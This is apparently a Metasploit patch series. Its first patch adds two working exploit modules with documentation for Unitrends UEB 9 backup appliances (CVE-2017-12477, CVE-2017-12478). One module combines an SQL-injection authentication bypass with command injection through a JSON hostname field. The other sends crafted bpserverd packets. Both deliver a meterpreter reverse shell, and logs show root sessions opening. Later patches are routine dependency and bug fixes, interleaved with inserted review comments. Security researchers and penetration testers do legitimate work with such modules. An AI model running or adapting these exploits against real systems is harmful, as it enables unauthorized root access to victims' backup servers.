From 36610b185bec5efe73242ed407cc8142b4c7a8bf Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 09:38:33 -0600 Subject: [PATCH 01/22] initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478 --- .../exploit/linux/http/ueb9_api_storage.md | 42 +++++++ .../exploit/linux/misc/ueb9_bpserverd.md | 72 ++++++++++++ .../exploits/linux/http/ueb9_api_storage.rb | 97 ++++++++++++++++ modules/exploits/linux/misc/ueb9_bpserverd.rb | 109 ++++++++++++++++++ 4 files changed, 320 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/ueb9_api_storage.md create mode 100644 documentation/modules/exploit/linux/misc/ueb9_bpserverd.md create mode 100644 modules/exploits/linux/http/ueb9_api_storage.rb create mode 100644 modules/exploits/linux/misc/ueb9_bpserverd.rb diff --git a/documentation/modules/exploit/linux/http/ueb9_api_storage.md b/documentation/modules/exploit/linux/http/ueb9_api_storage.md new file mode 100644 index 0000000000..05abde08c9 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ueb9_api_storage.md 
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+ Unitrends UEB 9 http api/storage remote root
+
+ This exploit leverages a sqli vulnerability for authentication bypass,
+ together with command injection for subsequent root RCE.
+
+## Verification Steps
+
+ 1. ```use exploit/linux/http/ueb9_api_storage ```
+ 2. ```set lhost [IP]```
+ 3. ```set rhost [IP]```
+ 4. ```exploit```
+ 5. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 9.1 on CentOS 6.5
+
+```
+msf > use exploit/linux/http/ueb9_api_storage
+msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
+rhost => 10.0.0.230
+msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
+lhost => 10.0.0.141
+msf exploit(ueb9_api_storage) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.141:4444
+[*] 10.0.0.230:443 - pwn'ng ueb 9....
+[*] Command Stager progress - 19.83% done (164/827 bytes)
+[*] Command Stager progress - 39.30% done (325/827 bytes)
+[*] Command Stager progress - 57.44% done (475/827 bytes)
+[*] Command Stager progress - 75.45% done (624/827 bytes)
+[*] Command Stager progress - 93.35% done (772/827 bytes)
+[*] Command Stager progress - 110.88% done (917/827 bytes)
+[*] Sending stage (826872 bytes) to 10.0.0.230
+[*] Command Stager progress - 126.72% done (1048/827 bytes)
+[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
\ No newline at end of file
diff --git a/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md
new file mode 100644
index 0000000000..8421e38570
--- /dev/null
+++ b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+ Unitrends UEB 9 bpserverd authentication bypass RCE
+
+ This exploit uses roughly the same process to gain root execution
+ as does the apache user on the Unitrends appliance. The process is
+ something like this:
+
+ 1. Connect to xinetd process (it's usually running on port 1743)
+ 2. This process will send something like: '?A,Connect36092'
+ 3. Initiate a second connection to the port specified
+ in the packet from xinetd (36092 in this example)
+ 4. send a specially crafted packet to xinetd, containing the
+ command to be executed as root
+ 5. Receive command output from the connection to port 36092
+ 6. Close both connections
+
+
+## Verification Steps
+
+ 1. ```use exploit/linux/misc/ueb9_bpserverd ```
+ 2. ```set lhost [IP]```
+ 3. ```set rhost [IP]```
+ 4. ```exploit```
+ 5. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 9.1 on CentOS 6.5
+
+```
+msf > use exploit/linux/misc/ueb9_bpserverd
+msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
+rhost => 10.0.0.230
+msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
+lhost => 10.0.0.141
+msf exploit(ueb9_bpserverd) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.141:4444
+[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 45425
+[*] 10.0.0.230:1743 - Connecting to 45425
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 40889
+[*] 10.0.0.230:1743 - Connecting to 40889
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 40016
+[*] 10.0.0.230:1743 - Connecting to 40016
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 53649
+[*] 10.0.0.230:1743 - Connecting to 53649
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] Sending stage (826872 bytes) to 10.0.0.230
+[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
+[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter >
+
+```
\ No newline at end of file
diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb
new file mode 100644
index 0000000000..e344ce3bf3
--- /dev/null
+++ b/modules/exploits/linux/http/ueb9_api_storage.rb
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'openssl'
+require 'base64'
+require 'uri'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Unitrends UEB 9 http api/storage remote root',
+ 'Description' => %q{
+ It was discovered that the api/storage web interface in Unitrends Backup (UB)
+ before 10.0.0 has an issue in which one of its input parameters was not validated.
+ A remote attacker could use this flaw to bypass authentication and execute arbitrary
+ commands with root privilege on the target system.
+ },
+ 'Author' =>
+ [
+ 'Cale Smith' # @0xC413
+ 'Benny Husted', # @BennyHusted
+ 'Jared Arave' # @iotennui
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86],
+ 'CmdStagerFlavor' => [ 'printf' ],
+ 'References' =>
+ [
+ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
+ ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
+ ['CVE', 'CVE-2017-12478'],
+ ],
+ 'Targets' =>
+ [
+ [ 'UEB 9.*', { } ]
+ ],
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+ 'SSL' => true
+ },
+ 'DisclosureDate' => 'Aug 8th 2017',
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptBool.new('SSL', [true, 'Use SSL', true])
+ ])
+ deregister_options('SRVHOST', 'SRVPORT')
+ end
+
+ #substitue some charactes
+ def filter_bad_chars(cmd)
+ cmd.gsub!("\\", "\\\\\\")
+ cmd.gsub!("'", '\\"')
+ end
+
+ def execute_command(cmd, opts = {})
+
+ session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass
+ session = Base64.strict_encode64(session) #b64 encode session token
+
+ #substitue the cmd into the hostname parameter
+ parms = "{\"type\":4,\"name\":\"_Stateless\",\"usage\":\"stateless\",\"build_filesystem\":1,\"properties\":{\"username\":\"aaaa\",\"password\":\"aaaa\",\"hostname\":\"`#{filter_bad_chars(cmd)}` &\",\"port\":\"2049\",\"protocol\":\"nfs\",\"share_name\":\"aaa\"}}"
+
+
+ res = send_request_cgi({
+ 'uri' => '/api/storage',
+ 'method' => 'POST',
+ 'ctype' => 'application/json',
+ 'encode_params' => false,
+ 'data' => parms,
+ 'headers' =>
+ {'AuthToken' => session,}
+ })
+
+ if res.code != 500
+ print_error("Unexpected response")
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+
+ def exploit
+ print_status("#{peer} - pwn'ng ueb 9....")
+ execute_cmdstager(:linemax => 120)
+
+ end
+end
\ No newline at end of file
diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb
new file mode 100644
index 0000000000..4a800e194b
--- /dev/null
+++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb
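Review bot: `OptBool.new('SSL', [true, 'Use SSL', true])` in `register_options` repeats what `'DefaultOptions' => { ... 'SSL' => true }` already sets a few lines earlier, and it re-registers an option that the `HttpClient` mixin presumably already defines. Keeping only the `DefaultOptions` entry leaves a single place where the TLS default lives: `register_options([Opt::RPORT(443)])`. The two comments `#substitue some charactes` and `#substitue the cmd into the hostname parameter` also carry typos (`substitute`, `characters`).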
@@ -0,0 +1,109 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Unitrends UEB bpserverd authentication bypass RCE', + 'Description' => %q{ + It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, + has an issue in which its authentication can be bypassed. A remote attacker could use this + issue to execute arbitrary commands with root privilege on the target system.™ + }, + 'Author' => + [ + 'Jared Arave', # @iotennui + 'Cale Smith', # @0xC413 + 'Benny Husted' # @BennyHusted + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => [ 'printf' ], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'], + ['CVE', 'CVE-2017-12477'], + ], + 'Targets' => + [ + [ 'UEB 9.*', { } ] + ], + 'Privileged' => true, + 'DefaultOptions' => + { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => false + }, + 'DisclosureDate' => 'Aug 8th 2017', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(1743), + ]) + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') + end + + def filter_bad_chars(cmd) + end + + def execute_command(cmd, opts = {}) + + #append a comment, ignore everything after our cmd + cmd = cmd + " #" + + # build the attack buffer... 
+ command_len = cmd.length + 3 + packet_len = cmd.length + 23 + data = "\xa5\x52\x00\x2d" + data << "\x00\x00\x00" + data << packet_len + data << "\x00\x00\x00" + data << "\x01" + data << "\x00\x00\x00" + data << "\x4c" + data << "\x00\x00\x00" + data << command_len + data << cmd + data << "\x00\x00\x00" + + begin + print_status("Connecting to xinetd for bpd port...") + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + + #parse out the bpd port returned, we will connect back on this port to send our cmd + bpd_port = buf1[-8..-3].to_i + + print_good("bpd port recieved: #{bpd_port.to_s}") + print_status("Connecting to #{bpd_port.to_s}") + + s2 = connect(global = false, opts = {'RPORT'=>bpd_port}) + print_good("Connected!") + + print_status("Sending command buffer to xinetd") + + s1.put(data) + s2.get_once(-1,1).to_s + + disconnect(s1) + disconnect(s2) + + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + end + + end + + def exploit + print_status("#{peer} - pwn'ng ueb 9....") + execute_cmdstager(:linemax => 200, :nodelete => true) + end +end From 78e262eabd794c5ed4827c6e3710e94978b3c186 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 10:15:30 -0600 Subject: [PATCH 02/22] fixed issues identified by msftidy --- modules/exploits/linux/http/ueb9_api_storage.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index e344ce3bf3..2c2bb933a6 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb 
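Review bot: In `execute_command` the two sockets are closed only on the success path, so any exception named in the `rescue` leaves `s1` (and possibly `s2`) open, and the handler only calls `elog`, so the caller is never told the command was not delivered. Moving the cleanup into an `ensure` clause closes both in every case: `ensure`, `disconnect(s1) if s1`, `disconnect(s2) if s2`. The value from `buf1[-8..-3].to_i` is also used as a port with no range check, so an unexpected banner becomes a connect attempt on port 0; rejecting anything outside 1..65535 before the second `connect` would make that failure explicit.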
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], - ['CVE', 'CVE-2017-12478'], + ['CVE', '2017-12478'], ], 'Targets' => [ @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => true }, - 'DisclosureDate' => 'Aug 8th 2017', + 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( [ @@ -94,4 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote execute_cmdstager(:linemax => 120) end -end \ No newline at end of file +end From 63e38923928eeb814f5459200e50ac8dfa305dec Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 10:16:01 -0600 Subject: [PATCH 03/22] fixed issues identified by msftidy --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index 4a800e194b..cc265a3710 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this - issue to execute arbitrary commands with root privilege on the target system.™ + issue to execute arbitrary commands with root privilege on the target system. }, 'Author' => [ @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'], - ['CVE', 'CVE-2017-12477'], + ['CVE', '2017-12477'], ], 'Targets' => [ 
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => false }, - 'DisclosureDate' => 'Aug 8th 2017', + 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( [ From 752d21e11c595001c460db03ab00d4c3784e51eb Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 10:47:42 -0600 Subject: [PATCH 04/22] forgot a comma --- modules/exploits/linux/http/ueb9_api_storage.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 2c2bb933a6..65267a3ee5 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Author' => [ - 'Cale Smith' # @0xC413 + 'Cale Smith', # @0xC413 'Benny Husted', # @BennyHusted 'Jared Arave' # @iotennui ], From c478133539861ab41759ce3dc75b017513eefb26 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 10 Oct 2017 23:19:44 -0500 Subject: [PATCH 05/22] add aggregator >= 1.0.0 with cryptTLV support --- Gemfile | 3 +-- Gemfile.lock | 32 ++++++++++++++++++++++++++++++++ 2 files changed, 33 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 3910ee17ff..12b6341b41 100755 --- a/Gemfile +++ b/Gemfile @@ -19,8 +19,7 @@ group :development do # module documentation gem 'octokit' # Metasploit::Aggregator external session proxy - # Disabled for now for crypttlv updates - # gem 'metasploit-aggregator' + gem 'metasploit-aggregator' end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 2243aadc1a..27b0044898 100644 --- a/Gemfile.lock +++ b/Gemfile.lock 
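Review bot: The re-enabled `gem 'metasploit-aggregator'` line in the Gemfile has no version requirement, although the subject says `>= 1.0.0` and the Gemfile.lock in the same commit records `metasploit-aggregator (~> 1.0.0)` under DEPENDENCIES. Bundler derives that entry from the Gemfile, so the two will disagree the next time the lock is regenerated; writing the constraint in the Gemfile, `gem 'metasploit-aggregator', '~> 1.0.0'`, keeps them in step. The gem also pulls `grpc`, `googleauth`, `signet` and `jwt` into the development bundle, which is worth noting in the comment above it so the larger dependency surface is a recorded decision.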
@@ -126,15 +126,39 @@ GEM ffi (1.9.18) filesize (0.1.1) fivemat (1.3.5) + google-protobuf (3.4.1.1) + googleapis-common-protos-types (1.0.0) + google-protobuf (~> 3.0) + googleauth (0.5.3) + faraday (~> 0.12) + jwt (~> 1.4) + logging (~> 2.0) + memoist (~> 0.12) + multi_json (~> 1.11) + os (~> 0.9) + signet (~> 0.7) + grpc (1.6.6) + google-protobuf (~> 3.1) + googleapis-common-protos-types (~> 1.0.0) + googleauth (~> 0.5.1) hashery (2.1.2) i18n (0.8.6) jsobfu (0.4.2) rkelly-remix json (2.1.0) + jwt (1.5.6) + little-plugger (1.1.4) + logging (2.2.2) + little-plugger (~> 1.1) + multi_json (~> 1.10) loofah (2.1.1) crass (~> 1.0.2) nokogiri (>= 1.5.9) + memoist (0.16.0) metasm (1.0.3) + metasploit-aggregator (1.0.0) + grpc + rex-arch metasploit-concern (2.0.5) activemodel (~> 4.2.6) activesupport (~> 4.2.6) @@ -168,6 +192,7 @@ GEM mini_portile2 (2.3.0) minitest (5.10.3) msgpack (1.1.0) + multi_json (1.12.2) multipart-post (2.0.0) nessus_rest (0.1.6) net-ssh (4.2.0) @@ -179,6 +204,7 @@ GEM sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.1) openvas-omp (0.0.4) + os (0.9.6) packetfu (1.1.13) pcaprub patch_finder (1.0.2) @@ -304,6 +330,11 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) + signet (0.7.3) + addressable (~> 2.3) + faraday (~> 0.9) + jwt (~> 1.5) + multi_json (~> 1.10) simplecov (0.15.1) docile (~> 1.1.0) json (>= 1.8, < 3) @@ -332,6 +363,7 @@ PLATFORMS DEPENDENCIES factory_girl_rails fivemat + metasploit-aggregator (~> 1.0.0) metasploit-framework! octokit pry From 5458b58a74a035e141a939dff0a85eff1330bdae Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 18 Oct 2017 13:21:02 -0500 Subject: [PATCH 06/22] restrict aggregator on arm for now --- Gemfile | 5 ++++- Gemfile.lock | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 12b6341b41..012578df9f 100755 --- a/Gemfile +++ b/Gemfile 
@@ -19,7 +19,10 @@ group :development do # module documentation gem 'octokit' # Metasploit::Aggregator external session proxy - gem 'metasploit-aggregator' + gem 'metasploit-aggregator' if [ + 'x86-mingw32', 'x64-mingw32', + 'x86_64-linux', 'x86-linux', + 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin')) end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 27b0044898..47d0e89ca5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -363,7 +363,7 @@ PLATFORMS DEPENDENCIES factory_girl_rails fivemat - metasploit-aggregator (~> 1.0.0) + metasploit-aggregator metasploit-framework! octokit pry From 7cd532c384271c63dc3dd21506890fb55a856760 Mon Sep 17 00:00:00 2001 From: Kent Gruber Date: Thu, 19 Oct 2017 19:55:58 -0400 Subject: [PATCH 07/22] Change targetr to target to fix small typo bug on one failure MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The target object seems to have a typo where it is referred to as “targetr” which I’d guess isn’t exactly what we’d like to do in this case. So, I’ve changed that to “target” in order to work. So, I’ve simply fixed that small typo. --- .../windows/browser/ms07_017_ani_loadimage_chunksize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index 2ff4a00222..522abb2448 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -494,7 +494,7 @@ class MetasploitModule < Msf::Exploit::Remote ].pack('v') else - fail_with(Failure::NoTarget, "Unknown target #{targetr['Method']}") + fail_with(Failure::NoTarget, "Unknown target #{target['Method']}") end # Build the ANI file From a3912e49131b4628faab5424b17235754ac28817 Mon Sep 17 00:00:00 2001 
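Review bot: The `if [...].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))` modifier is evaluated when the Gemfile is loaded, so the declared gem set differs per host while the one committed Gemfile.lock always lists `metasploit-aggregator` and its `grpc` chain. On a platform outside the list Bundler will likely see Gemfile and lock disagree, and a frozen or deployment install may refuse to run. Bundler's `install_if` keeps the declaration constant and skips only installation: `install_if -> { <same platform test> } do`, `gem 'metasploit-aggregator'`, `end`. The exact-string list also looks brittle, since `x86-linux` is a RubyGems platform name and `RUBY_PLATFORM` on 32-bit Linux usually reports something like `i686-linux`; please confirm against the hosts you mean to support.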
From: RageLtMan Date: Wed, 18 Oct 2017 14:37:22 -0400 Subject: [PATCH 08/22] Provide disconnect option to send_request_cgi The HTTP client mixin provides a #send_request_cgi method which forcibly disconnects the client after receiving a response. This terminates certain types of resulting sessions which depend on the connection from the client to maintain a subprocess housing the shell invocation. Provide a disconnect boolean option to #send_request_cgi which is checked in the disconnect(c) call after receiving the response. Testing: Locally tested on in-house exploit module written for disclosure report. TODO: Discuss possibility of implementing fully asynchronous methods like #send_request_cgi_async which won't bother getting a response for cases such as the module mentioned above which is a command injection via unfiltered POST var. --- lib/msf/core/exploit/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index d7bcc0c46e..daa6ac6f83 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -334,7 +334,7 @@ module Exploit::Remote::HttpClient # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}. # # @return (see Rex::Proto::Http::Client#send_recv)) - def send_request_cgi(opts={}, timeout = 20) + def send_request_cgi(opts={}, timeout = 20, disconnect = true) if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 actual_timeout = datastore['HttpClientTimeout'] else @@ -362,7 +362,7 @@ module Exploit::Remote::HttpClient print_line('#' * 20) print_line(res.to_terminal_output) end - disconnect(c) + disconnect(c) if disconnect res rescue ::Errno::EPIPE, ::Timeout::Error => e print_line(e.message) if datastore['HttpTrace'] From 8e5deac3f48ee8f4343a487ea46ae9c7ed001ca5 Mon Sep 17 00:00:00 2001 
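Review bot: With `disconnect = false` the connection `c` is neither closed nor handed back, since the method still returns only `res`, so the caller has no handle to close it later and each such call appears to leave a socket open until the module is torn down. Either expose the client when the flag is off or state in the method comment where cleanup is expected to happen. The parameter is also named like the `disconnect(c)` method it guards, which makes `disconnect(c) if disconnect` hard to read, and the YARD block above the signature gains no entry for it; `# @param disconnect [Boolean] close the connection once the response has been read` would cover that. The body of `send_request_cgi` between the two hunks is outside the diff.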
From: William Vu Date: Fri, 20 Oct 2017 00:38:01 -0500 Subject: [PATCH 09/22] Fix nil bug in setting PromptChar without Prompt --- lib/msf/ui/console/driver.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index f43d99e36c..1e303bf4ee 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -593,7 +593,7 @@ class Driver < Msf::Ui::Driver when "prompt" update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true) when "promptchar" - update_prompt(framework.datastore['Prompt'], val, true) + update_prompt(framework.datastore['Prompt'] || DefaultPrompt, val, true) end end From 884b68fa601d0c3cc1710e89b0dc8638c33aa5ad Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 20 Oct 2017 10:02:23 -0700 Subject: [PATCH 10/22] Bump version of framework to 4.16.13 --- Gemfile.lock | 48 +++++++++++++++-------------- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 26 insertions(+), 24 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 787243fc70..1ac48727a1 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.12) + metasploit-framework (4.16.13) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -104,13 +104,14 @@ GEM arel (6.0.4) arel-helpers (2.5.0) activerecord (>= 3.1.0, < 6) - backports (3.10.0) + backports (3.10.3) bcrypt (3.1.11) bcrypt_pbkdf (1.0.0) bindata (2.4.1) bit-struct (0.16) builder (3.2.3) coderay (1.1.2) + concurrent-ruby (1.0.5) crass (1.0.2) diff-lcs (1.3) dnsruby (1.60.2) @@ -137,12 +138,13 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.6.6) + grpc (1.6.7) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (~> 0.5.1) hashery (2.1.2) - i18n (0.8.6) + i18n (0.9.0) + concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix json (2.1.0) 
@@ -221,7 +223,7 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.11.1) + pry (0.11.2) coderay (~> 1.1.0) method_source (~> 0.9.0) public_suffix (3.0.0) @@ -297,29 +299,29 @@ GEM rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) - rspec (3.6.0) - rspec-core (~> 3.6.0) - rspec-expectations (~> 3.6.0) - rspec-mocks (~> 3.6.0) - rspec-core (3.6.0) - rspec-support (~> 3.6.0) - rspec-expectations (3.6.0) + rspec (3.7.0) + rspec-core (~> 3.7.0) + rspec-expectations (~> 3.7.0) + rspec-mocks (~> 3.7.0) + rspec-core (3.7.0) + rspec-support (~> 3.7.0) + rspec-expectations (3.7.0) diff-lcs (>= 1.2.0, < 2.0) - rspec-support (~> 3.6.0) - rspec-mocks (3.6.0) + rspec-support (~> 3.7.0) + rspec-mocks (3.7.0) diff-lcs (>= 1.2.0, < 2.0) - rspec-support (~> 3.6.0) - rspec-rails (3.6.1) + rspec-support (~> 3.7.0) + rspec-rails (3.7.1) actionpack (>= 3.0) activesupport (>= 3.0) railties (>= 3.0) - rspec-core (~> 3.6.0) - rspec-expectations (~> 3.6.0) - rspec-mocks (~> 3.6.0) - rspec-support (~> 3.6.0) + rspec-core (~> 3.7.0) + rspec-expectations (~> 3.7.0) + rspec-mocks (~> 3.7.0) + rspec-support (~> 3.7.0) rspec-rerun (1.1.0) rspec (~> 3.0) - rspec-support (3.6.0) + rspec-support (3.7.0) ruby-rc4 (0.1.5) ruby_smb (0.0.18) bindata @@ -330,10 +332,10 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) - signet (0.7.3) + signet (0.8.1) addressable (~> 2.3) faraday (~> 0.9) - jwt (~> 1.5) + jwt (>= 1.5, < 3.0) multi_json (~> 1.10) simplecov (0.15.1) docile (~> 1.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index f79f808ff4..c111856d17 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.12" + VERSION = "4.16.13" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From e8de6a46d5efabc0f66ca047e134613caf01b6be Mon Sep 17 00:00:00 2001 
